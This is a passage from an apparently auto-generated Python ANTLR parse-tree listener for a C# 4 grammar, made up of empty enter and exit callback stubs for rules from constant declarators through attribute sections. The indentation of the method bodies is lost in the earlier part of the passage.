def enterConstant_declarators(self, ctx: CSharp4Parser.Constant_declaratorsContext):
pass
# Exit a parse tree produced by CSharp4Parser#constant_declarators.
def exitConstant_declarators(self, ctx: CSharp4Parser.Constant_declaratorsContext):
pass
# Enter a parse tree produced by CSharp4Parser#constant_declarator.
def enterConstant_declarator(self, ctx: CSharp4Parser.Constant_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#constant_declarator.
def exitConstant_declarator(self, ctx: CSharp4Parser.Constant_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#variable_declarators.
def enterVariable_declarators(self, ctx: CSharp4Parser.Variable_declaratorsContext):
pass
# Exit a parse tree produced by CSharp4Parser#variable_declarators.
def exitVariable_declarators(self, ctx: CSharp4Parser.Variable_declaratorsContext):
pass
# Enter a parse tree produced by CSharp4Parser#variable_declarator.
def enterVariable_declarator(self, ctx: CSharp4Parser.Variable_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#variable_declarator.
def exitVariable_declarator(self, ctx: CSharp4Parser.Variable_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#variable_initializer.
def enterVariable_initializer(self, ctx: CSharp4Parser.Variable_initializerContext):
pass
# Exit a parse tree produced by CSharp4Parser#variable_initializer.
def exitVariable_initializer(self, ctx: CSharp4Parser.Variable_initializerContext):
pass
# Enter a parse tree produced by CSharp4Parser#method_declaration.
def enterMethod_declaration(self, ctx: CSharp4Parser.Method_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#method_declaration.
def exitMethod_declaration(self, ctx: CSharp4Parser.Method_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#method_header.
def enterMethod_header(self, ctx: CSharp4Parser.Method_headerContext):
pass
# Exit a parse tree produced by CSharp4Parser#method_header.
def exitMethod_header(self, ctx: CSharp4Parser.Method_headerContext):
pass
# Enter a parse tree produced by CSharp4Parser#method_modifiers.
def enterMethod_modifiers(self, ctx: CSharp4Parser.Method_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#method_modifiers.
def exitMethod_modifiers(self, ctx: CSharp4Parser.Method_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#method_modifier.
def enterMethod_modifier(self, ctx: CSharp4Parser.Method_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#method_modifier.
def exitMethod_modifier(self, ctx: CSharp4Parser.Method_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#return_type.
def enterReturn_type(self, ctx: CSharp4Parser.Return_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#return_type.
def exitReturn_type(self, ctx: CSharp4Parser.Return_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#member_name.
def enterMember_name(self, ctx: CSharp4Parser.Member_nameContext):
pass
# Exit a parse tree produced by CSharp4Parser#member_name.
def exitMember_name(self, ctx: CSharp4Parser.Member_nameContext):
pass
# Enter a parse tree produced by CSharp4Parser#method_body.
def enterMethod_body(self, ctx: CSharp4Parser.Method_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#method_body.
def exitMethod_body(self, ctx: CSharp4Parser.Method_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#formal_parameter_list.
def enterFormal_parameter_list(self, ctx: CSharp4Parser.Formal_parameter_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#formal_parameter_list.
def exitFormal_parameter_list(self, ctx: CSharp4Parser.Formal_parameter_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_parameters.
def enterFixed_parameters(self, ctx: CSharp4Parser.Fixed_parametersContext):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_parameters.
def exitFixed_parameters(self, ctx: CSharp4Parser.Fixed_parametersContext):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_parameter.
def enterFixed_parameter(self, ctx: CSharp4Parser.Fixed_parameterContext):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_parameter.
def exitFixed_parameter(self, ctx: CSharp4Parser.Fixed_parameterContext):
pass
# Enter a parse tree produced by CSharp4Parser#default_argument.
def enterDefault_argument(self, ctx: CSharp4Parser.Default_argumentContext):
pass
# Exit a parse tree produced by CSharp4Parser#default_argument.
def exitDefault_argument(self, ctx: CSharp4Parser.Default_argumentContext):
pass
# Enter a parse tree produced by CSharp4Parser#parameter_modifier.
def enterParameter_modifier(self, ctx: CSharp4Parser.Parameter_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#parameter_modifier.
def exitParameter_modifier(self, ctx: CSharp4Parser.Parameter_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#parameter_array.
def enterParameter_array(self, ctx: CSharp4Parser.Parameter_arrayContext):
pass
# Exit a parse tree produced by CSharp4Parser#parameter_array.
def exitParameter_array(self, ctx: CSharp4Parser.Parameter_arrayContext):
pass
# Enter a parse tree produced by CSharp4Parser#property_declaration.
def enterProperty_declaration(self, ctx: CSharp4Parser.Property_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#property_declaration.
def exitProperty_declaration(self, ctx: CSharp4Parser.Property_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#property_modifiers.
def enterProperty_modifiers(self, ctx: CSharp4Parser.Property_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#property_modifiers.
def exitProperty_modifiers(self, ctx: CSharp4Parser.Property_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#property_modifier.
def enterProperty_modifier(self, ctx: CSharp4Parser.Property_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#property_modifier.
def exitProperty_modifier(self, ctx: CSharp4Parser.Property_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#accessor_declarations.
def enterAccessor_declarations(self, ctx: CSharp4Parser.Accessor_declarationsContext):
pass
# Exit a parse tree produced by CSharp4Parser#accessor_declarations.
def exitAccessor_declarations(self, ctx: CSharp4Parser.Accessor_declarationsContext):
pass
# Enter a parse tree produced by CSharp4Parser#get_accessor_declaration.
def enterGet_accessor_declaration(self, ctx: CSharp4Parser.Get_accessor_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#get_accessor_declaration.
def exitGet_accessor_declaration(self, ctx: CSharp4Parser.Get_accessor_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#set_accessor_declaration.
def enterSet_accessor_declaration(self, ctx: CSharp4Parser.Set_accessor_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#set_accessor_declaration.
def exitSet_accessor_declaration(self, ctx: CSharp4Parser.Set_accessor_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#accessor_modifier.
def enterAccessor_modifier(self, ctx: CSharp4Parser.Accessor_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#accessor_modifier.
def exitAccessor_modifier(self, ctx: CSharp4Parser.Accessor_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#accessor_body.
def enterAccessor_body(self, ctx: CSharp4Parser.Accessor_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#accessor_body.
def exitAccessor_body(self, ctx: CSharp4Parser.Accessor_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#event_declaration.
def enterEvent_declaration(self, ctx: CSharp4Parser.Event_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#event_declaration.
def exitEvent_declaration(self, ctx: CSharp4Parser.Event_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#event_modifiers.
def enterEvent_modifiers(self, ctx: CSharp4Parser.Event_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#event_modifiers.
def exitEvent_modifiers(self, ctx: CSharp4Parser.Event_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#event_modifier.
def enterEvent_modifier(self, ctx: CSharp4Parser.Event_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#event_modifier.
def exitEvent_modifier(self, ctx: CSharp4Parser.Event_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#event_accessor_declarations.
def enterEvent_accessor_declarations(self, ctx: CSharp4Parser.Event_accessor_declarationsContext):
pass
# Exit a parse tree produced by CSharp4Parser#event_accessor_declarations.
def exitEvent_accessor_declarations(self, ctx: CSharp4Parser.Event_accessor_declarationsContext):
pass
# Enter a parse tree produced by CSharp4Parser#add_accessor_declaration.
def enterAdd_accessor_declaration(self, ctx: CSharp4Parser.Add_accessor_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#add_accessor_declaration.
def exitAdd_accessor_declaration(self, ctx: CSharp4Parser.Add_accessor_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#remove_accessor_declaration.
def enterRemove_accessor_declaration(self, ctx: CSharp4Parser.Remove_accessor_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#remove_accessor_declaration.
def exitRemove_accessor_declaration(self, ctx: CSharp4Parser.Remove_accessor_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_declaration.
def enterIndexer_declaration(self, ctx: CSharp4Parser.Indexer_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_declaration.
def exitIndexer_declaration(self, ctx: CSharp4Parser.Indexer_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_modifiers.
def enterIndexer_modifiers(self, ctx: CSharp4Parser.Indexer_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_modifiers.
def exitIndexer_modifiers(self, ctx: CSharp4Parser.Indexer_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_modifier.
def enterIndexer_modifier(self, ctx: CSharp4Parser.Indexer_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_modifier.
def exitIndexer_modifier(self, ctx: CSharp4Parser.Indexer_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_declarator.
def enterIndexer_declarator(self, ctx: CSharp4Parser.Indexer_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_declarator.
def exitIndexer_declarator(self, ctx: CSharp4Parser.Indexer_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#operator_declaration.
def enterOperator_declaration(self, ctx: CSharp4Parser.Operator_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#operator_declaration.
def exitOperator_declaration(self, ctx: CSharp4Parser.Operator_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#operator_modifiers.
def enterOperator_modifiers(self, ctx: CSharp4Parser.Operator_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#operator_modifiers.
def exitOperator_modifiers(self, ctx: CSharp4Parser.Operator_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#operator_modifier.
def enterOperator_modifier(self, ctx: CSharp4Parser.Operator_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#operator_modifier.
def exitOperator_modifier(self, ctx: CSharp4Parser.Operator_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#operator_declarator.
def enterOperator_declarator(self, ctx: CSharp4Parser.Operator_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#operator_declarator.
def exitOperator_declarator(self, ctx: CSharp4Parser.Operator_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#unary_operator_declarator.
def enterUnary_operator_declarator(self, ctx: CSharp4Parser.Unary_operator_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#unary_operator_declarator.
def exitUnary_operator_declarator(self, ctx: CSharp4Parser.Unary_operator_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#overloadable_unary_operator.
def enterOverloadable_unary_operator(self, ctx: CSharp4Parser.Overloadable_unary_operatorContext):
pass
# Exit a parse tree produced by CSharp4Parser#overloadable_unary_operator.
def exitOverloadable_unary_operator(self, ctx: CSharp4Parser.Overloadable_unary_operatorContext):
pass
# Enter a parse tree produced by CSharp4Parser#binary_operator_declarator.
def enterBinary_operator_declarator(self, ctx: CSharp4Parser.Binary_operator_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#binary_operator_declarator.
def exitBinary_operator_declarator(self, ctx: CSharp4Parser.Binary_operator_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#overloadable_binary_operator.
def enterOverloadable_binary_operator(self, ctx: CSharp4Parser.Overloadable_binary_operatorContext):
pass
# Exit a parse tree produced by CSharp4Parser#overloadable_binary_operator.
def exitOverloadable_binary_operator(self, ctx: CSharp4Parser.Overloadable_binary_operatorContext):
pass
# Enter a parse tree produced by CSharp4Parser#overloadable_operator.
def enterOverloadable_operator(self, ctx: CSharp4Parser.Overloadable_operatorContext):
pass
# Exit a parse tree produced by CSharp4Parser#overloadable_operator.
def exitOverloadable_operator(self, ctx: CSharp4Parser.Overloadable_operatorContext):
pass
# Enter a parse tree produced by CSharp4Parser#conversion_operator_declarator.
def enterConversion_operator_declarator(self, ctx: CSharp4Parser.Conversion_operator_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#conversion_operator_declarator.
def exitConversion_operator_declarator(self, ctx: CSharp4Parser.Conversion_operator_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#operator_body.
def enterOperator_body(self, ctx: CSharp4Parser.Operator_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#operator_body.
def exitOperator_body(self, ctx: CSharp4Parser.Operator_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_declaration.
def enterConstructor_declaration(self, ctx: CSharp4Parser.Constructor_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_declaration.
def exitConstructor_declaration(self, ctx: CSharp4Parser.Constructor_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_modifiers.
def enterConstructor_modifiers(self, ctx: CSharp4Parser.Constructor_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_modifiers.
def exitConstructor_modifiers(self, ctx: CSharp4Parser.Constructor_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_modifier.
def enterConstructor_modifier(self, ctx: CSharp4Parser.Constructor_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_modifier.
def exitConstructor_modifier(self, ctx: CSharp4Parser.Constructor_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_declarator.
def enterConstructor_declarator(self, ctx: CSharp4Parser.Constructor_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_declarator.
def exitConstructor_declarator(self, ctx: CSharp4Parser.Constructor_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_initializer.
def enterConstructor_initializer(self, ctx: CSharp4Parser.Constructor_initializerContext):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_initializer.
def exitConstructor_initializer(self, ctx: CSharp4Parser.Constructor_initializerContext):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_body.
def enterConstructor_body(self, ctx: CSharp4Parser.Constructor_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_body.
def exitConstructor_body(self, ctx: CSharp4Parser.Constructor_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#static_constructor_declaration.
def enterStatic_constructor_declaration(self, ctx: CSharp4Parser.Static_constructor_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#static_constructor_declaration.
def exitStatic_constructor_declaration(self, ctx: CSharp4Parser.Static_constructor_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#static_constructor_modifiers.
def enterStatic_constructor_modifiers(self, ctx: CSharp4Parser.Static_constructor_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#static_constructor_modifiers.
def exitStatic_constructor_modifiers(self, ctx: CSharp4Parser.Static_constructor_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#static_constructor_body.
def enterStatic_constructor_body(self, ctx: CSharp4Parser.Static_constructor_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#static_constructor_body.
def exitStatic_constructor_body(self, ctx: CSharp4Parser.Static_constructor_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#destructor_declaration.
def enterDestructor_declaration(self, ctx: CSharp4Parser.Destructor_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#destructor_declaration.
def exitDestructor_declaration(self, ctx: CSharp4Parser.Destructor_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#destructor_body.
def enterDestructor_body(self, ctx: CSharp4Parser.Destructor_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#destructor_body.
def exitDestructor_body(self, ctx: CSharp4Parser.Destructor_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#body.
def enterBody(self, ctx: CSharp4Parser.BodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#body.
def exitBody(self, ctx: CSharp4Parser.BodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#struct_declaration.
def enterStruct_declaration(self, ctx: CSharp4Parser.Struct_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#struct_declaration.
def exitStruct_declaration(self, ctx: CSharp4Parser.Struct_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#struct_modifiers.
def enterStruct_modifiers(self, ctx: CSharp4Parser.Struct_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#struct_modifiers.
def exitStruct_modifiers(self, ctx: CSharp4Parser.Struct_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#struct_modifier.
def enterStruct_modifier(self, ctx: CSharp4Parser.Struct_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#struct_modifier.
def exitStruct_modifier(self, ctx: CSharp4Parser.Struct_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#struct_interfaces.
def enterStruct_interfaces(self, ctx: CSharp4Parser.Struct_interfacesContext):
pass
# Exit a parse tree produced by CSharp4Parser#struct_interfaces.
def exitStruct_interfaces(self, ctx: CSharp4Parser.Struct_interfacesContext):
pass
# Enter a parse tree produced by CSharp4Parser#struct_body.
def enterStruct_body(self, ctx: CSharp4Parser.Struct_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#struct_body.
def exitStruct_body(self, ctx: CSharp4Parser.Struct_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#struct_member_declarations.
def enterStruct_member_declarations(self, ctx: CSharp4Parser.Struct_member_declarationsContext):
pass
# Exit a parse tree produced by CSharp4Parser#struct_member_declarations.
def exitStruct_member_declarations(self, ctx: CSharp4Parser.Struct_member_declarationsContext):
pass
# Enter a parse tree produced by CSharp4Parser#struct_member_declaration.
def enterStruct_member_declaration(self, ctx: CSharp4Parser.Struct_member_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#struct_member_declaration.
def exitStruct_member_declaration(self, ctx: CSharp4Parser.Struct_member_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#array_type.
def enterArray_type(self, ctx: CSharp4Parser.Array_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#array_type.
def exitArray_type(self, ctx: CSharp4Parser.Array_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#non_array_type.
def enterNon_array_type(self, ctx: CSharp4Parser.Non_array_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#non_array_type.
def exitNon_array_type(self, ctx: CSharp4Parser.Non_array_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#rank_specifiers.
def enterRank_specifiers(self, ctx: CSharp4Parser.Rank_specifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#rank_specifiers.
def exitRank_specifiers(self, ctx: CSharp4Parser.Rank_specifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#rank_specifier.
def enterRank_specifier(self, ctx: CSharp4Parser.Rank_specifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#rank_specifier.
def exitRank_specifier(self, ctx: CSharp4Parser.Rank_specifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#dim_separators.
def enterDim_separators(self, ctx: CSharp4Parser.Dim_separatorsContext):
pass
# Exit a parse tree produced by CSharp4Parser#dim_separators.
def exitDim_separators(self, ctx: CSharp4Parser.Dim_separatorsContext):
pass
# Enter a parse tree produced by CSharp4Parser#array_initializer.
def enterArray_initializer(self, ctx: CSharp4Parser.Array_initializerContext):
pass
# Exit a parse tree produced by CSharp4Parser#array_initializer.
def exitArray_initializer(self, ctx: CSharp4Parser.Array_initializerContext):
pass
# Enter a parse tree produced by CSharp4Parser#variable_initializer_list.
def enterVariable_initializer_list(self, ctx: CSharp4Parser.Variable_initializer_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#variable_initializer_list.
def exitVariable_initializer_list(self, ctx: CSharp4Parser.Variable_initializer_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_declaration.
def enterInterface_declaration(self, ctx: CSharp4Parser.Interface_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_declaration.
def exitInterface_declaration(self, ctx: CSharp4Parser.Interface_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_modifiers.
def enterInterface_modifiers(self, ctx: CSharp4Parser.Interface_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_modifiers.
def exitInterface_modifiers(self, ctx: CSharp4Parser.Interface_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_modifier.
def enterInterface_modifier(self, ctx: CSharp4Parser.Interface_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_modifier.
def exitInterface_modifier(self, ctx: CSharp4Parser.Interface_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#variant_type_parameter_list.
def enterVariant_type_parameter_list(self, ctx: CSharp4Parser.Variant_type_parameter_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#variant_type_parameter_list.
def exitVariant_type_parameter_list(self, ctx: CSharp4Parser.Variant_type_parameter_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#variant_type_parameters.
def enterVariant_type_parameters(self, ctx: CSharp4Parser.Variant_type_parametersContext):
pass
# Exit a parse tree produced by CSharp4Parser#variant_type_parameters.
def exitVariant_type_parameters(self, ctx: CSharp4Parser.Variant_type_parametersContext):
pass
# Enter a parse tree produced by CSharp4Parser#variance_annotation.
def enterVariance_annotation(self, ctx: CSharp4Parser.Variance_annotationContext):
pass
# Exit a parse tree produced by CSharp4Parser#variance_annotation.
def exitVariance_annotation(self, ctx: CSharp4Parser.Variance_annotationContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_base.
def enterInterface_base(self, ctx: CSharp4Parser.Interface_baseContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_base.
def exitInterface_base(self, ctx: CSharp4Parser.Interface_baseContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_body.
def enterInterface_body(self, ctx: CSharp4Parser.Interface_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_body.
def exitInterface_body(self, ctx: CSharp4Parser.Interface_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_member_declarations.
def enterInterface_member_declarations(self, ctx: CSharp4Parser.Interface_member_declarationsContext):
    pass
# Exit a parse tree produced by CSharp4Parser#interface_member_declarations.
def exitInterface_member_declarations(self, ctx: CSharp4Parser.Interface_member_declarationsContext):
    pass
# Enter a parse tree produced by CSharp4Parser#interface_member_declaration.
def enterInterface_member_declaration(self, ctx: CSharp4Parser.Interface_member_declarationContext):
    pass
# Exit a parse tree produced by CSharp4Parser#interface_member_declaration.
def exitInterface_member_declaration(self, ctx: CSharp4Parser.Interface_member_declarationContext):
    pass
# Enter a parse tree produced by CSharp4Parser#interface_method_declaration.
def enterInterface_method_declaration(self, ctx: CSharp4Parser.Interface_method_declarationContext):
    pass
# Exit a parse tree produced by CSharp4Parser#interface_method_declaration.
def exitInterface_method_declaration(self, ctx: CSharp4Parser.Interface_method_declarationContext):
    pass
# Enter a parse tree produced by CSharp4Parser#interface_property_declaration.
def enterInterface_property_declaration(self, ctx: CSharp4Parser.Interface_property_declarationContext):
    pass
# Exit a parse tree produced by CSharp4Parser#interface_property_declaration.
def exitInterface_property_declaration(self, ctx: CSharp4Parser.Interface_property_declarationContext):
    pass
# Enter a parse tree produced by CSharp4Parser#interface_accessors.
def enterInterface_accessors(self, ctx: CSharp4Parser.Interface_accessorsContext):
    pass
# Exit a parse tree produced by CSharp4Parser#interface_accessors.
def exitInterface_accessors(self, ctx: CSharp4Parser.Interface_accessorsContext):
    pass
# Enter a parse tree produced by CSharp4Parser#interface_event_declaration.
def enterInterface_event_declaration(self, ctx: CSharp4Parser.Interface_event_declarationContext):
    pass
# Exit a parse tree produced by CSharp4Parser#interface_event_declaration.
def exitInterface_event_declaration(self, ctx: CSharp4Parser.Interface_event_declarationContext):
    pass
# Enter a parse tree produced by CSharp4Parser#interface_indexer_declaration.
def enterInterface_indexer_declaration(self, ctx: CSharp4Parser.Interface_indexer_declarationContext):
    pass
# Exit a parse tree produced by CSharp4Parser#interface_indexer_declaration.
def exitInterface_indexer_declaration(self, ctx: CSharp4Parser.Interface_indexer_declarationContext):
    pass
# Enter a parse tree produced by CSharp4Parser#enum_declaration.
def enterEnum_declaration(self, ctx: CSharp4Parser.Enum_declarationContext):
    pass
# Exit a parse tree produced by CSharp4Parser#enum_declaration.
def exitEnum_declaration(self, ctx: CSharp4Parser.Enum_declarationContext):
    pass
# Enter a parse tree produced by CSharp4Parser#enum_base.
def enterEnum_base(self, ctx: CSharp4Parser.Enum_baseContext):
    pass
# Exit a parse tree produced by CSharp4Parser#enum_base.
def exitEnum_base(self, ctx: CSharp4Parser.Enum_baseContext):
    pass
# Enter a parse tree produced by CSharp4Parser#enum_body.
def enterEnum_body(self, ctx: CSharp4Parser.Enum_bodyContext):
    pass
# Exit a parse tree produced by CSharp4Parser#enum_body.
def exitEnum_body(self, ctx: CSharp4Parser.Enum_bodyContext):
    pass
# Enter a parse tree produced by CSharp4Parser#enum_modifiers.
def enterEnum_modifiers(self, ctx: CSharp4Parser.Enum_modifiersContext):
    pass
# Exit a parse tree produced by CSharp4Parser#enum_modifiers.
def exitEnum_modifiers(self, ctx: CSharp4Parser.Enum_modifiersContext):
    pass
# Enter a parse tree produced by CSharp4Parser#enum_modifier.
def enterEnum_modifier(self, ctx: CSharp4Parser.Enum_modifierContext):
    pass
# Exit a parse tree produced by CSharp4Parser#enum_modifier.
def exitEnum_modifier(self, ctx: CSharp4Parser.Enum_modifierContext):
    pass
# Enter a parse tree produced by CSharp4Parser#enum_member_declarations.
def enterEnum_member_declarations(self, ctx: CSharp4Parser.Enum_member_declarationsContext):
    pass
# Exit a parse tree produced by CSharp4Parser#enum_member_declarations.
def exitEnum_member_declarations(self, ctx: CSharp4Parser.Enum_member_declarationsContext):
    pass
# Enter a parse tree produced by CSharp4Parser#enum_member_declaration.
def enterEnum_member_declaration(self, ctx: CSharp4Parser.Enum_member_declarationContext):
    pass
# Exit a parse tree produced by CSharp4Parser#enum_member_declaration.
def exitEnum_member_declaration(self, ctx: CSharp4Parser.Enum_member_declarationContext):
    pass
# Enter a parse tree produced by CSharp4Parser#delegate_declaration.
def enterDelegate_declaration(self, ctx: CSharp4Parser.Delegate_declarationContext):
    pass
# Exit a parse tree produced by CSharp4Parser#delegate_declaration.
def exitDelegate_declaration(self, ctx: CSharp4Parser.Delegate_declarationContext):
    pass
# Enter a parse tree produced by CSharp4Parser#delegate_modifiers.
def enterDelegate_modifiers(self, ctx: CSharp4Parser.Delegate_modifiersContext):
    pass
# Exit a parse tree produced by CSharp4Parser#delegate_modifiers.
def exitDelegate_modifiers(self, ctx: CSharp4Parser.Delegate_modifiersContext):
    pass
# Enter a parse tree produced by CSharp4Parser#delegate_modifier.
def enterDelegate_modifier(self, ctx: CSharp4Parser.Delegate_modifierContext):
    pass
# Exit a parse tree produced by CSharp4Parser#delegate_modifier.
def exitDelegate_modifier(self, ctx: CSharp4Parser.Delegate_modifierContext):
    pass
# Enter a parse tree produced by CSharp4Parser#global_attributes.
def enterGlobal_attributes(self, ctx: CSharp4Parser.Global_attributesContext):
    pass
# Exit a parse tree produced by CSharp4Parser#global_attributes.
def exitGlobal_attributes(self, ctx: CSharp4Parser.Global_attributesContext):
    pass
# Enter a parse tree produced by CSharp4Parser#global_attribute_sections.
def enterGlobal_attribute_sections(self, ctx: CSharp4Parser.Global_attribute_sectionsContext):
    pass
# Exit a parse tree produced by CSharp4Parser#global_attribute_sections.
def exitGlobal_attribute_sections(self, ctx: CSharp4Parser.Global_attribute_sectionsContext):
    pass
# Enter a parse tree produced by CSharp4Parser#global_attribute_section.
def enterGlobal_attribute_section(self, ctx: CSharp4Parser.Global_attribute_sectionContext):
    pass
# Exit a parse tree produced by CSharp4Parser#global_attribute_section.
def exitGlobal_attribute_section(self, ctx: CSharp4Parser.Global_attribute_sectionContext):
    pass
# Enter a parse tree produced by CSharp4Parser#global_attribute_target_specifier.
def enterGlobal_attribute_target_specifier(self, ctx: CSharp4Parser.Global_attribute_target_specifierContext):
    pass
# Exit a parse tree produced by CSharp4Parser#global_attribute_target_specifier.
def exitGlobal_attribute_target_specifier(self, ctx: CSharp4Parser.Global_attribute_target_specifierContext):
    pass
# Enter a parse tree produced by CSharp4Parser#global_attribute_target.
def enterGlobal_attribute_target(self, ctx: CSharp4Parser.Global_attribute_targetContext):
    pass
# Exit a parse tree produced by CSharp4Parser#global_attribute_target.
def exitGlobal_attribute_target(self, ctx: CSharp4Parser.Global_attribute_targetContext):
    pass
# Enter a parse tree produced by CSharp4Parser#attributes.
def enterAttributes(self, ctx: CSharp4Parser.AttributesContext):
    pass
# Exit a parse tree produced by CSharp4Parser#attributes.
def exitAttributes(self, ctx: CSharp4Parser.AttributesContext):
    pass
# Enter a parse tree produced by CSharp4Parser#attribute_sections.
def enterAttribute_sections(self, ctx: CSharp4Parser.Attribute_sectionsContext):
    pass
# Exit a parse tree produced by CSharp4Parser#attribute_sections.
